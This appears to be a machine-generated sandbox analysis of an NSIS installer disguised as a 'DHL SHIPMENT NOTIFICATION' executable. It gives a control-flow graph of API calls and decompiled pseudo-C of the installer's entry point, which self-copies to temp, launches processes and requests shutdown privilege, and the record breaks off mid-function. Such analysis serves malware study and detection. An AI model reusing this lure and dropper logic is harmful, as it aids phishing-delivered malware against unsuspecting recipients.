3884->3889 3886 4020fa 3885->3886 3887 402110 LoadLibraryExW 3886->3887 3888 402102 GetModuleHandleW 3886->3888 3887->3880 3890 402121 3887->3890 3888->3887 3888->3890 3899 406aaa 3890->3899 3893 402132 3896 401423 24 API calls 3893->3896 3897 402142 3893->3897 3894 40216b 3895 4056d0 24 API calls 3894->3895 3895->3897 3896->3897 3897->3889 3898 40218e FreeLibrary 3897->3898 3898->3889 3904 406690 WideCharToMultiByte 3899->3904 3901 406ac7 3902 40212c 3901->3902 3903 406ace GetProcAddress 3901->3903 3902->3893 3902->3894 3903->3902 3904->3901 3905 402b59 3906 402b60 3905->3906 3907 402bab 3905->3907 3909 402ba9 3906->3909 3911 402d84 17 API calls 3906->3911 3908 406a3b 5 API calls 3907->3908 3910 402bb2 3908->3910 3912 402da6 17 API calls 3910->3912 3913 402b6e 3911->3913 3914 402bbb 3912->3914 3915 402d84 17 API calls 3913->3915 3914->3909 3916 402bbf IIDFromString 3914->3916 3918 402b7a 3915->3918 3916->3909 3917 402bce 3916->3917 3917->3909 3923 40666e lstrcpynW 3917->3923 3922 4065b5 wsprintfW 3918->3922 3920 402beb CoTaskMemFree 3920->3909 3922->3909 3923->3920 3924 402a5b 3925 402d84 17 API calls 3924->3925 3926 402a61 3925->3926 3927 402aa4 3926->3927 3928 402a88 3926->3928 3935 40292e 3926->3935 3929 402abe 3927->3929 3930 402aae 3927->3930 3931 402a8d 3928->3931 3932 402a9e 3928->3932 3934 4066ab 17 API calls 3929->3934 3933 402d84 17 API calls 3930->3933 3938 40666e lstrcpynW 3931->3938 3932->3935 3939 4065b5 wsprintfW 3932->3939 3933->3932 3934->3932 3938->3935 3939->3935 3940 403cdb 3941 403ce6 3940->3941 3942 403cea 3941->3942 3943 403ced GlobalAlloc 3941->3943 3943->3942 3712 40175c 3713 402da6 17 API calls 3712->3713 3714 401763 3713->3714 3715 40618d 2 API calls 3714->3715 3716 40176a 3715->3716 3717 40618d 2 API calls 3716->3717 3717->3716 3944 401d5d 3945 402d84 17 API calls 3944->3945 3946 401d6e SetWindowLongW 3945->3946 3947 402c2a 3946->3947 3948 4028de 3949 4028e6 3948->3949 3950 4028ea FindNextFileW 3949->3950 3952 4028fc 3949->3952 3951 
402943 3950->3951 3950->3952 3954 40666e lstrcpynW 3951->3954 3954->3952 3955 401563 3956 402ba4 3955->3956 3959 4065b5 wsprintfW 3956->3959 3958 402ba9 3959->3958 3960 401968 3961 402d84 17 API calls 3960->3961 3962 40196f 3961->3962 3963 402d84 17 API calls 3962->3963 3964 40197c 3963->3964 3965 402da6 17 API calls 3964->3965 3966 401993 lstrlenW 3965->3966 3968 4019a4 3966->3968 3967 4019e5 3968->3967 3972 40666e lstrcpynW 3968->3972 3970 4019d5 3970->3967 3971 4019da lstrlenW 3970->3971 3971->3967 3972->3970 3973 40166a 3974 402da6 17 API calls 3973->3974 3975 401670 3974->3975 3976 4069a4 2 API calls 3975->3976 3977 401676 3976->3977 3978 402aeb 3979 402d84 17 API calls 3978->3979 3981 402af1 3979->3981 3980 40292e 3981->3980 3982 4066ab 17 API calls 3981->3982 3982->3980 3983 4026ec 3984 402d84 17 API calls 3983->3984 3985 4026fb 3984->3985 3986 402745 ReadFile 3985->3986 3987 4061e1 ReadFile 3985->3987 3989 402785 MultiByteToWideChar 3985->3989 3990 40283a 3985->3990 3992 4027ab SetFilePointer MultiByteToWideChar 3985->3992 3993 40284b 3985->3993 3995 402838 3985->3995 3996 40623f SetFilePointer 3985->3996 3986->3985 3986->3995 3987->3985 3989->3985 4005 4065b5 wsprintfW 3990->4005 3992->3985 3994 40286c SetFilePointer 3993->3994 3993->3995 3994->3995 3997 40625b 3996->3997 4004 406273 3996->4004 3998 4061e1 ReadFile 3997->3998 3999 406267 3998->3999 4000 4062a4 SetFilePointer 3999->4000 4001 40627c SetFilePointer 3999->4001 3999->4004 4000->4004 4001->4000 4002 406287 4001->4002 4003 406210 WriteFile 4002->4003 4003->4004 4004->3985 4005->3995 3718 40176f 3719 402da6 17 API calls 3718->3719 3720 401776 3719->3720 3721 401796 3720->3721 3722 40179e 3720->3722 3757 40666e lstrcpynW 3721->3757 3758 40666e lstrcpynW 3722->3758 3725 40179c 3729 4068f5 5 API calls 3725->3729 3726 4017a9 3727 405f3d 3 API calls 3726->3727 3728 4017af lstrcatW 3727->3728 3728->3725 3745 4017bb 3729->3745 3730 4069a4 2 API calls 3730->3745 3731 406139 2 API calls 3731->3745 3733 
4017cd CompareFileTime 3733->3745 3734 40188d 3736 4056d0 24 API calls 3734->3736 3735 401864 3737 4056d0 24 API calls 3735->3737 3746 401879 3735->3746 3739 401897 3736->3739 3737->3746 3738 40666e lstrcpynW 3738->3745 3740 403377 40 API calls 3739->3740 3741 4018aa 3740->3741 3742 4018be SetFileTime 3741->3742 3744 4018d0 FindCloseChangeNotification 3741->3744 3742->3744 3743 4066ab 17 API calls 3743->3745 3744->3746 3747 4018e1 3744->3747 3745->3730 3745->3731 3745->3733 3745->3734 3745->3735 3745->3738 3745->3743 3753 405cce MessageBoxIndirectW 3745->3753 3756 40615e GetFileAttributesW CreateFileW 3745->3756 3748 4018e6 3747->3748 3749 4018f9 3747->3749 3751 4066ab 17 API calls 3748->3751 3750 4066ab 17 API calls 3749->3750 3752 401901 3750->3752 3754 4018ee lstrcatW 3751->3754 3755 405cce MessageBoxIndirectW 3752->3755 3753->3745 3754->3752 3755->3746 3756->3745 3757->3725 3758->3726 4006 401a72 4007 402d84 17 API calls 4006->4007 4008 401a7b 4007->4008 4009 402d84 17 API calls 4008->4009 4010 401a20 4009->4010 4011 401573 4012 401583 ShowWindow 4011->4012 4013 40158c 4011->4013 4012->4013 4014 402c2a 4013->4014 4015 40159a ShowWindow 4013->4015 4015->4014 4016 404a74 4017 404a84 4016->4017 4018 404aaa 4016->4018 4019 4045ca 18 API calls 4017->4019 4020 404631 8 API calls 4018->4020 4021 404a91 SetDlgItemTextW 4019->4021 4022 404ab6 4020->4022 4021->4018 4023 4023f4 4024 402da6 17 API calls 4023->4024 4025 402403 4024->4025 4026 402da6 17 API calls 4025->4026 4027 40240c 4026->4027 4028 402da6 17 API calls 4027->4028 4029 402416 GetPrivateProfileStringW 4028->4029 4030 4014f5 SetForegroundWindow 4031 402c2a 4030->4031 4032 401ff6 4033 402da6 17 API calls 4032->4033 4034 401ffd 4033->4034 4035 4069a4 2 API calls 4034->4035 4036 402003 4035->4036 4038 402014 4036->4038 4039 4065b5 wsprintfW 4036->4039 4039->4038 4040 401b77 4041 402da6 17 API calls 4040->4041 4042 401b7e 4041->4042 4043 402d84 17 API calls 4042->4043 4044 401b87 wsprintfW 4043->4044 4045 402c2a 
4044->4045 4046 40167b 4047 402da6 17 API calls 4046->4047 4048 401682 4047->4048 4049 402da6 17 API calls 4048->4049 4050 40168b 4049->4050 4051 402da6 17 API calls 4050->4051 4052 401694 MoveFileW 4051->4052 4053 4016a7 4052->4053 4059 4016a0 4052->4059 4054 4069a4 2 API calls 4053->4054 4055 4022f6 4053->4055 4057 4016b6 4054->4057 4056 401423 24 API calls 4056->4055 4057->4055 4058 40642e 36 API calls 4057->4058 4058->4059 4059->4056 4060 4019ff 4061 402da6 17 API calls 4060->4061 4062 401a06 4061->4062 4063 402da6 17 API calls 4062->4063 4064 401a0f 4063->4064 4065 401a16 lstrcmpiW 4064->4065 4066 401a28 lstrcmpW 4064->4066 4067 401a1c 4065->4067 4066->4067 4068 4022ff 4069 402da6 17 API calls 4068->4069 4070 402305 4069->4070 4071 402da6 17 API calls 4070->4071 4072 40230e 4071->4072 4073 402da6 17 API calls 4072->4073 4074 402317 4073->4074 4075 4069a4 2 API calls 4074->4075 4076 402320 4075->4076 4077 402331 lstrlenW lstrlenW 4076->4077 4078 402324 4076->4078 4080 4056d0 24 API calls 4077->4080 4079 4056d0 24 API calls 4078->4079 4082 40232c 4078->4082 4079->4082 4081 40236f SHFileOperationW 4080->4081 4081->4078 4081->4082 4083 401000 4084 401037 BeginPaint GetClientRect 4083->4084 4085 40100c DefWindowProcW 4083->4085 4086 4010f3 4084->4086 4090 401179 4085->4090 4088 401073 CreateBrushIndirect FillRect DeleteObject 4086->4088 4089 4010fc 4086->4089 4088->4086 4091 401102 CreateFontIndirectW 4089->4091 4092 401167 EndPaint 4089->4092 4091->4092 4093 401112 6 API calls 4091->4093 4092->4090 4093->4092 4094 404700 lstrcpynW lstrlenW 4095 401d81 4096 401d94 GetDlgItem 4095->4096 4097 401d87 4095->4097 4100 401d8e 4096->4100 4098 402d84 17 API calls 4097->4098 4098->4100 4099 401dd5 GetClientRect LoadImageW SendMessageW 4103 401e33 4099->4103 4105 401e3f 4099->4105 4100->4099 4101 402da6 17 API calls 4100->4101 4101->4099 4104 401e38 DeleteObject 4103->4104 4103->4105 4104->4105 4106 401503 4107 40150b 4106->4107 4109 40151e 4106->4109 4108 402d84 17 API 
calls 4107->4108 4108->4109 4110 402383 4111 40238a 4110->4111 4113 40239d 4110->4113 4112 4066ab 17 API calls 4111->4112 4114 402397 4112->4114 4115 405cce MessageBoxIndirectW 4114->4115 4115->4113 4116 402c05 SendMessageW 4117 402c1f InvalidateRect 4116->4117 4118 402c2a 4116->4118 4117->4118 4119 404789 4121 4048bb 4119->4121 4122 4047a1 4119->4122 4120 404925 4123 4049ef 4120->4123 4124 40492f GetDlgItem 4120->4124 4121->4120 4121->4123 4130 4048f6 GetDlgItem SendMessageW 4121->4130 4125 4045ca 18 API calls 4122->4125 4129 404631 8 API calls 4123->4129 4126 4049b0 4124->4126 4127 404949 4124->4127 4128 404808 4125->4128 4126->4123 4133 4049c2 4126->4133 4127->4126 4132 40496f SendMessageW LoadCursorW SetCursor 4127->4132 4131 4045ca 18 API calls 4128->4131 4143 4049ea 4129->4143 4152 4045ec EnableWindow 4130->4152 4136 404815 CheckDlgButton 4131->4136 4156 404a38 4132->4156 4138 4049d8 4133->4138 4139 4049c8 SendMessageW 4133->4139 4135 404920 4153 404a14 4135->4153 4150 4045ec EnableWindow 4136->4150 4138->4143 4144 4049de SendMessageW 4138->4144 4139->4138 4144->4143 4145 404833 GetDlgItem 4151 4045ff SendMessageW 4145->4151 4147 404849 SendMessageW 4148 404866 GetSysColor 4147->4148 4149 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4147->4149 4148->4149 4149->4143 4150->4145 4151->4147 4152->4135 4154 404a22 4153->4154 4155 404a27 SendMessageW 4153->4155 4154->4155 4155->4120 4159 405c94 ShellExecuteExW 4156->4159 4158 40499e LoadCursorW SetCursor 4158->4126 4159->4158 4160 40248a 4161 402da6 17 API calls 4160->4161 4162 40249c 4161->4162 4163 402da6 17 API calls 4162->4163 4164 4024a6 4163->4164 4177 402e36 4164->4177 4167 4024de 4168 4024ea 4167->4168 4172 402d84 17 API calls 4167->4172 4173 402509 RegSetValueExW 4168->4173 4174 403377 40 API calls 4168->4174 4169 40292e 4170 402da6 17 API calls 4171 4024d4 lstrlenW 4170->4171 4171->4167 4172->4168 4175 40251f RegCloseKey 4173->4175 4174->4173 4175->4169 4178 402e51 4177->4178 4181 
406509 4178->4181 4182 406518 4181->4182 4183 406523 RegCreateKeyExW 4182->4183 4184 4024b6 4182->4184 4183->4184 4184->4167 4184->4169 4184->4170 4185 40290b 4186 402da6 17 API calls 4185->4186 4187 402912 FindFirstFileW 4186->4187 4188 40293a 4187->4188 4192 402925 4187->4192 4193 4065b5 wsprintfW 4188->4193 4190 402943 4194 40666e lstrcpynW 4190->4194 4193->4190 4194->4192 4195 40190c 4196 401943 4195->4196 4197 402da6 17 API calls 4196->4197 4198 401948 4197->4198 4199 405d7a 67 API calls 4198->4199 4200 401951 4199->4200 4201 40190f 4202 402da6 17 API calls 4201->4202 4203 401916 4202->4203 4204 405cce MessageBoxIndirectW 4203->4204 4205 40191f 4204->4205 4206 40580f 4207 405830 GetDlgItem GetDlgItem GetDlgItem 4206->4207 4208 4059b9 4206->4208 4251 4045ff SendMessageW 4207->4251 4210 4059c2 GetDlgItem CreateThread CloseHandle 4208->4210 4211 4059ea 4208->4211 4210->4211 4213 405a01 ShowWindow ShowWindow 4211->4213 4214 405a3a 4211->4214 4215 405a15 4211->4215 4212 4058a0 4217 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4212->4217 4253 4045ff SendMessageW 4213->4253 4221 404631 8 API calls 4214->4221 4216 405a75 4215->4216 4219 405a29 4215->4219 4220 405a4f ShowWindow 4215->4220 4216->4214 4226 405a83 SendMessageW 4216->4226 4224 405915 4217->4224 4225 4058f9 SendMessageW SendMessageW 4217->4225 4227 4045a3 SendMessageW 4219->4227 4222 405a61 4220->4222 4223 405a6f 4220->4223 4228 405a48 4221->4228 4229 4056d0 24 API calls 4222->4229 4230 4045a3 SendMessageW 4223->4230 4231 405928 4224->4231 4232 40591a SendMessageW 4224->4232 4225->4224 4226->4228 4233 405a9c CreatePopupMenu 4226->4233 4227->4214 4229->4223 4230->4216 4235 4045ca 18 API calls 4231->4235 4232->4231 4234 4066ab 17 API calls 4233->4234 4236 405aac AppendMenuW 4234->4236 4237 405938 4235->4237 4238 405ac9 GetWindowRect 4236->4238 4239 405adc TrackPopupMenu 4236->4239 4240 405941 ShowWindow 4237->4240 4241 405975 GetDlgItem SendMessageW 4237->4241 4238->4239 4239->4228 4243 
405af7 4239->4243 4244 405964 4240->4244 4245 405957 ShowWindow 4240->4245 4241->4228 4242 40599c SendMessageW SendMessageW 4241->4242 4242->4228 4246 405b13 SendMessageW 4243->4246 4252 4045ff SendMessageW 4244->4252 4245->4244 4246->4246 4248 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4246->4248 4249 405b55 SendMessageW 4248->4249 4249->4249 4250 405b7e GlobalUnlock SetClipboardData CloseClipboard 4249->4250 4250->4228 4251->4212 4252->4241 4253->4215 4254 404e11 4255 404e21 4254->4255 4256 404e3d 4254->4256 4265 405cb2 GetDlgItemTextW 4255->4265 4258 404e70 4256->4258 4259 404e43 SHGetPathFromIDListW 4256->4259 4261 404e5a SendMessageW 4259->4261 4262 404e53 4259->4262 4260 404e2e SendMessageW 4260->4256 4261->4258 4264 40140b 2 API calls 4262->4264 4264->4261 4265->4260 4266 401491 4267 4056d0 24 API calls 4266->4267 4268 401498 4267->4268 4269 402891 4270 402898 4269->4270 4271 402ba9 4269->4271 4272 402d84 17 API calls 4270->4272 4273 40289f 4272->4273 4274 4028ae SetFilePointer 4273->4274 4274->4271 4275 4028be 4274->4275 4277 4065b5 wsprintfW 4275->4277 4277->4271 4278 401f12 4279 402da6 17 API calls 4278->4279 4280 401f18 4279->4280 4281 402da6 17 API calls 4280->4281 4282 401f21 4281->4282 4283 402da6 17 API calls 4282->4283 4284 401f2a 4283->4284 4285 402da6 17 API calls 4284->4285 4286 401f33 4285->4286 4287 401423 24 API calls 4286->4287 4288 401f3a 4287->4288 4295 405c94 ShellExecuteExW 4288->4295 4290 401f82 4291 406ae6 5 API calls 4290->4291 4293 40292e 4290->4293 4292 401f9f CloseHandle 4291->4292 4292->4293 4295->4290 4296 402f93 4297 402fa5 SetTimer 4296->4297 4298 402fbe 4296->4298 4297->4298 4299 40300c 4298->4299 4300 403012 MulDiv 4298->4300 4301 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4300->4301 4301->4299 4303 401d17 4304 402d84 17 API calls 4303->4304 4305 401d1d IsWindow 4304->4305 4306 401a20 4305->4306 4307 401b9b 4308 401ba8 4307->4308 4309 401bec 4307->4309 4310 401c31 4308->4310 4317 401bbf 4308->4317 4311 
401bf1 4309->4311 4312 401c16 GlobalAlloc 4309->4312 4313 4066ab 17 API calls 4310->4313 4321 40239d 4310->4321 4311->4321 4328 40666e lstrcpynW 4311->4328 4314 4066ab 17 API calls 4312->4314 4315 402397 4313->4315 4314->4310 4320 405cce MessageBoxIndirectW 4315->4320 4326 40666e lstrcpynW 4317->4326 4318 401c03 GlobalFree 4318->4321 4320->4321 4322 401bce 4327 40666e lstrcpynW 4322->4327 4324 401bdd 4329 40666e lstrcpynW 4324->4329 4326->4322 4327->4324 4328->4318 4329->4321 4330 40261c 4331 402da6 17 API calls 4330->4331 4332 402623 4331->4332 4335 40615e GetFileAttributesW CreateFileW 4332->4335 4334 40262f 4335->4334 4336 40149e 4337 4014ac PostQuitMessage 4336->4337 4338 40239d 4336->4338 4337->4338 4339 40259e 4349 402de6 4339->4349 4342 402d84 17 API calls 4343 4025b1 4342->4343 4344 4025d9 RegEnumValueW 4343->4344 4345 4025cd RegEnumKeyW 4343->4345 4347 40292e 4343->4347 4346 4025ee RegCloseKey 4344->4346 4345->4346 4346->4347 4350 402da6 17 API calls 4349->4350 4351 402dfd 4350->4351 4352 4064db RegOpenKeyExW 4351->4352 4353 4025a8 4352->4353 4353->4342 4354 4015a3 4355 402da6 17 API calls 4354->4355 4356 4015aa SetFileAttributesW 4355->4356 4357 4015bc 4356->4357 3287 401fa4 3288 402da6 17 API calls 3287->3288 3289 401faa 3288->3289 3290 4056d0 24 API calls 3289->3290 3291 401fb4 3290->3291 3302 405c51 CreateProcessW 3291->3302 3294 401fdd CloseHandle 3298 40292e 3294->3298 3297 401fcf 3299 401fd4 3297->3299 3300 401fdf 3297->3300 3310 4065b5 wsprintfW 3299->3310 3300->3294 3303 401fba 3302->3303 3304 405c84 CloseHandle 3302->3304 3303->3294 3303->3298 3305 406ae6 WaitForSingleObject 3303->3305 3304->3303 3306 406b00 3305->3306 3307 406b12 GetExitCodeProcess 3306->3307 3311 406a77 3306->3311 3307->3297 3310->3294 3312 406a94 PeekMessageW 3311->3312 3313 406aa4 WaitForSingleObject 3312->3313 3314 406a8a DispatchMessageW 3312->3314 3313->3306 3314->3312 4358 40202a 4359 402da6 17 API calls 4358->4359 4360 402031 4359->4360 4361 406a3b 5 API calls 4360->4361 

                        Control-flow Graph

                        C-Code - Quality: 78%
                        			_entry_() {
                        				WCHAR* _v8;
                        				signed int _v12;
                        				void* _v16;
                        				signed int _v20;
                        				int _v24;
                        				int _v28;
                        				struct _TOKEN_PRIVILEGES _v40;
                        				signed char _v42;
                        				int _v44;
                        				signed int _v48;
                        				intOrPtr _v278;
                        				signed short _v310;
                        				struct _OSVERSIONINFOW _v324;
                        				struct _SHFILEINFOW _v1016;
                        				intOrPtr* _t88;
                        				WCHAR* _t92;
                        				char* _t94;
                        				void _t97;
                        				void* _t116;
                        				WCHAR* _t118;
                        				signed int _t119;
                        				intOrPtr* _t123;
                        				void* _t137;
                        				void* _t143;
                        				void* _t148;
                        				void* _t152;
                        				void* _t157;
                        				signed int _t167;
                        				void* _t170;
                        				void* _t175;
                        				intOrPtr _t177;
                        				intOrPtr _t178;
                        				intOrPtr* _t179;
                        				int _t188;
                        				void* _t189;
                        				void* _t198;
                        				signed int _t204;
                        				signed int _t209;
                        				signed int _t214;
                        				signed int _t216;
                        				int* _t218;
                        				signed int _t226;
                        				signed int _t229;
                        				CHAR* _t231;
                        				char* _t232;
                        				signed int _t233;
                        				WCHAR* _t234;
                        				void* _t250;
                        
                        				_t216 = 0x20;
                        				_t188 = 0;
                        				_v24 = 0;
                        				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                        				_v20 = 0;
                        				SetErrorMode(0x8001); // executed
                        				_v324.szCSDVersion = 0;
                        				_v48 = 0;
                        				_v44 = 0;
                        				_v324.dwOSVersionInfoSize = 0x11c;
                        				if(GetVersionExW( &_v324) == 0) {
                        					_v324.dwOSVersionInfoSize = 0x114;
                        					GetVersionExW( &_v324);
                        					asm("sbb eax, eax");
                        					_v42 = 4;
                        					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                        				}
                        				if(_v324.dwMajorVersion < 0xa) {
                        					_v310 = _v310 & 0x00000000;
                        				}
                        				 *0x7a8b58 = _v324.dwBuildNumber;
                        				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                        				if( *0x7a8b5e != 0x600) {
                        					_t179 = E00406A3B(_t188);
                        					if(_t179 != _t188) {
                        						 *_t179(0xc00);
                        					}
                        				}
                        				_t231 = "UXTHEME";
                        				do {
                        					E004069CB(_t231); // executed
                        					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                        				} while ( *_t231 != 0);
                        				E00406A3B(0xb);
                        				 *0x7a8aa4 = E00406A3B(9);
                        				_t88 = E00406A3B(7);
                        				if(_t88 != _t188) {
                        					_t88 =  *_t88(0x1e);
                        					if(_t88 != 0) {
                        						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
                        					}
                        				}
                        				__imp__#17();
                        				__imp__OleInitialize(_t188); // executed
                        				 *0x7a8b60 = _t88;
                        				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
                        				E0040666E(0x7a7aa0, L"NSIS Error");
                        				_t92 = GetCommandLineW();
                        				_t232 = L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ";
                        				E0040666E(_t232, _t92);
                        				_t94 = _t232;
                        				_t233 = 0x22;
                        				 *0x7a8aa0 = 0x400000;
                        				_t250 = L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" " - _t233; // 0x22
                        				if(_t250 == 0) {
                        					_t216 = _t233;
                        					_t94 =  &M007B3002;
                        				}
                        				_t198 = CharNextW(E00405F6A(_t94, _t216));
                        				_v16 = _t198;
                        				while(1) {
                        					_t97 =  *_t198;
                        					_t251 = _t97 - _t188;
                        					if(_t97 == _t188) {
                        						break;
                        					}
                        					_t209 = 0x20;
                        					__eflags = _t97 - _t209;
                        					if(_t97 != _t209) {
                        						L17:
                        						__eflags =  *_t198 - _t233;
                        						_v12 = _t209;
                        						if( *_t198 == _t233) {
                        							_v12 = _t233;
                        							_t198 = _t198 + 2;
                        							__eflags = _t198;
                        						}
                        						__eflags =  *_t198 - 0x2f;
                        						if( *_t198 != 0x2f) {
                        							L32:
                        							_t198 = E00405F6A(_t198, _v12);
                        							__eflags =  *_t198 - _t233;
                        							if(__eflags == 0) {
                        								_t198 = _t198 + 2;
                        								__eflags = _t198;
                        							}
                        							continue;
                        						} else {
                        							_t198 = _t198 + 2;
                        							__eflags =  *_t198 - 0x53;
                        							if( *_t198 != 0x53) {
                        								L24:
                        								asm("cdq");
                        								asm("cdq");
                        								_t214 = L"NCRC" & 0x0000ffff;
                        								asm("cdq");
                        								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                        								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                        								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                        									L29:
                        									asm("cdq");
                        									asm("cdq");
                        									_t209 = L" /D=" & 0x0000ffff;
                        									asm("cdq");
                        									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                        									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                        									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                        										L31:
                        										_t233 = 0x22;
                        										goto L32;
                        									}
                        									__eflags =  *_t198 - _t229;
                        									if( *_t198 == _t229) {
                        										 *(_t198 - 4) = _t188;
                        										__eflags = _t198;
                        										E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
                        										L37:
                        										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
                        										GetTempPathW(0x400, _t234);
                        										_t116 = E00403615(_t198, _t251);
                        										_t252 = _t116;
                        										if(_t116 != 0) {
                        											L40:
                        											DeleteFileW(L"1033"); // executed
                        											_t118 = E004030D0(_t254, _v20); // executed
                        											_v8 = _t118;
                        											if(_t118 != _t188) {
                        												L68:
                        												ExitProcess(); // executed
                        												__imp__OleUninitialize(); // executed
                        												if(_v8 == _t188) {
                        													if( *0x7a8b34 == _t188) {
                        														L77:
                        														_t119 =  *0x7a8b4c;
                        														if(_t119 != 0xffffffff) {
                        															_v24 = _t119;
                        														}
                        														ExitProcess(_v24);
                        													}
                        													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                        														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                        														_v40.PrivilegeCount = 1;
                        														_v28 = 2;
                        														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                        													}
                        													_t123 = E00406A3B(4);
                        													if(_t123 == _t188) {
                        														L75:
                        														if(ExitWindowsEx(2, 0x80040002) != 0) {
                        															goto L77;
                        														}
                        														goto L76;
                        													} else {
                        														_push(0x80040002);
                        														_push(0x25);
                        														_push(_t188);
                        														_push(_t188);
                        														_push(_t188);
                        														if( *_t123() == 0) {
                        															L76:
                        															E0040140B(9);
                        															goto L77;
                        														}
                        														goto L75;
                        													}
                        												}
                        												E00405CCE(_v8, 0x200010);
                        												ExitProcess(2);
                        											}
                        											if( *0x7a8abc == _t188) {
                        												L51:
                        												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
                        												_v24 = E00403D1D(_t264);
                        												goto L68;
                        											}
                        											_t218 = E00405F6A(L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ", _t188);
                        											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ") {
                        												L48:
                        												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ";
                        												_v8 = L"Error launching installer";
                        												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ") {
                        													_t189 = E00405C39(__eflags);
                        													lstrcatW(_t234, L"~nsu");
                        													__eflags = _t189;
                        													if(_t189 != 0) {
                        														lstrcatW(_t234, "A");
                        													}
                        													lstrcatW(_t234, L".tmp");
                        													_t219 = L"C:\\Users\\jones\\Desktop";
                        													_t137 = lstrcmpiW(_t234, L"C:\\Users\\jones\\Desktop");
                        													__eflags = _t137;
                        													if(_t137 == 0) {
                        														L67:
                        														_t188 = 0;
                        														__eflags = 0;
                        														goto L68;
                        													} else {
                        														__eflags = _t189;
                        														_push(_t234);
                        														if(_t189 == 0) {
                        															E00405C1C();
                        														} else {
                        															E00405B9F();
                        														}
                        														SetCurrentDirectoryW(_t234);
                        														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                        														if(__eflags == 0) {
                        															E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t219);
                        														}
                        														E0040666E(0x7a9000, _v16);
                        														_t201 = "A" & 0x0000ffff;
                        														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                        														__eflags = _t143;
                        														_v12 = 0x1a;
                        														 *0x7a9800 = _t143;
                        														do {
                        															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
                        															DeleteFileW(0x79f748);
                        															__eflags = _v8;
                        															if(_v8 != 0) {
                        																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe", 0x79f748, 1);
                        																__eflags = _t148;
                        																if(_t148 != 0) {
                        																	E0040642E(_t201, 0x79f748, 0);
                        																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
                        																	_t152 = E00405C51(0x79f748);
                        																	__eflags = _t152;
                        																	if(_t152 != 0) {
                        																		CloseHandle(_t152);
                        																		_v8 = 0;
                        																	}
                        																}
                        															}
                        															 *0x7a9800 =  *0x7a9800 + 1;
                        															_t61 =  &_v12;
                        															 *_t61 = _v12 - 1;
                        															__eflags =  *_t61;
                        														} while ( *_t61 != 0);
                        														E0040642E(_t201, _t234, 0);
                        														goto L67;
                        													}
                        												}
                        												 *_t218 = _t188;
                        												_t221 =  &(_t218[2]);
                        												_t157 = E00406045(_t263,  &(_t218[2]));
                        												_t264 = _t157;
                        												if(_t157 == 0) {
                        													goto L68;
                        												}
                        												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
                        												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
                        												_v8 = _t188;
                        												goto L51;
                        											}
                        											asm("cdq");
                        											asm("cdq");
                        											asm("cdq");
                        											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                        											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                        											while( *_t218 != _t204 || _t218[1] != _t167) {
                        												_t218 = _t218;
                        												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ") {
                        													continue;
                        												}
                        												break;
                        											}
                        											_t188 = 0;
                        											goto L48;
                        										}
                        										GetWindowsDirectoryW(_t234, 0x3fb);
                        										lstrcatW(_t234, L"\\Temp");
                        										_t170 = E00403615(_t198, _t252);
                        										_t253 = _t170;
                        										if(_t170 != 0) {
                        											goto L40;
                        										}
                        										GetTempPathW(0x3fc, _t234);
                        										lstrcatW(_t234, L"Low");
                        										SetEnvironmentVariableW(L"TEMP", _t234);
                        										SetEnvironmentVariableW(L"TMP", _t234);
                        										_t175 = E00403615(_t198, _t253);
                        										_t254 = _t175;
                        										if(_t175 == 0) {
